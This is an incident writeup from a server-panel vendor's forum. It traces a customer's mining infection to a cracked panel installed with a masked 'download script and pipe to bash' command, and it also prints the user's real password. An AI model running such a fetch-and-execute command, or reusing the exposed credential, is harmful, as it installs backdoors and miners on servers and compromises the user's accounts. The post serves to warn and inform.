【运维笔记】面板被入侵挖矿？原来是破解脚本在搞事

起因：有用户找过来，说面板被他人爆破，下面是他提供的腾讯云截图

第一个通知就是异地登录提醒



随后紧跟着密码爆破提醒



再就是木马上传的提醒了，有3个木马，2个挖矿脚本





那么问题就来了，用户反馈他是16位的密码，先不说复杂度有多高，这里直接揭晓密码，爆破14000+次就成功了？？？？针对性字典还是密码泄露？

1. V6JRNfVt4;BA|HCt

复制代码

经过进一步沟通，用户反馈他前几天新装的面板，还没有上网站也没有来得及安装软件

随后登录面板检查，企业版用户？没有在我们的企业运维群里面，询问后发现不是我们官网购买的企业版

进行常规检查，安装记录，命令如下，好家伙(链接已经打码处理，请不要尝试，后果自负)

1. http://xxxxxxx.yu.al/ltxxxxd/instxxxxxall/uxxxxpdaxxxte6.sh|bxxxash

复制代码

破解版？！

谜底基本揭晓，这种长度的密码14000+次爆破，不用多说了吧，要么执行破解版面板命令后有后门，或你的所有密码...懂得都懂

提醒：我们提供的免费版功能已基本满足大多数用户需求，请不要执行带有安全隐患的第三方破解脚本

参考另一篇运维笔记：https://www.bt.cn/bbs/thread-82900-1-1.html